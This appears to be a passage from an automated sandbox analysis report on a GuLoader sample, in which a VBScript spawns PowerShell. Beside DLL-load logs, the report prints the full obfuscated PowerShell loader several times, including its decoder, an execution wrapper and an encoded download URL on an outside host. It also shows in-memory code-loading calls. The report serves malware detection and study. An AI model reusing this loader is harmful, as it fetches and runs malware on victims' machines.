';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbz' source: powershell.exe, 0000000D.00000002.2539499175.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tomation.pdbGk source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization ", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000D.00000002.2577528361.000000000A45F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2577384991.00000000088A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Illaqueable)$gloBaL:fireSIdE = [sYSteM.TExT.eNCODiNG]::AScIi.geTSTrinG($BomByciLlA)$GLObal:pylorOUs69=$fIresIde.SUbsTrINg($kATinaNTerGRaFt12,$KlANdREt)<#Successorship Detentionslokal
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((wigans $Djiboutieres $Unrobustness), (Trmnds @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afhndende = [AppDomain]::CurrentDomain.GetAssemblies()$global:
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Gimmerlams)), $Podosperm).DefineDynamicModule($Udsvejfninger, $false).DefineType($Helicteres, $Miljplaner, [System.MulticastDelegate])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Illaqueable)$gloBaL:fireSIdE = [sYSteM.TExT.eNCODiNG]::AScIi.geTSTrinG($BomByciLlA)$GLObal:pylorOUs69=$fIresIde.SUbsTrINg($kATinaNTerGRaFt12,$KlANdREt)<#Successorship Detentionslokal
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACBA6F97 push esp; retf 4_2_00007FFAACBA6F98
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACC716A1 pushad ; retf 4_2_00007FFAACC716C1
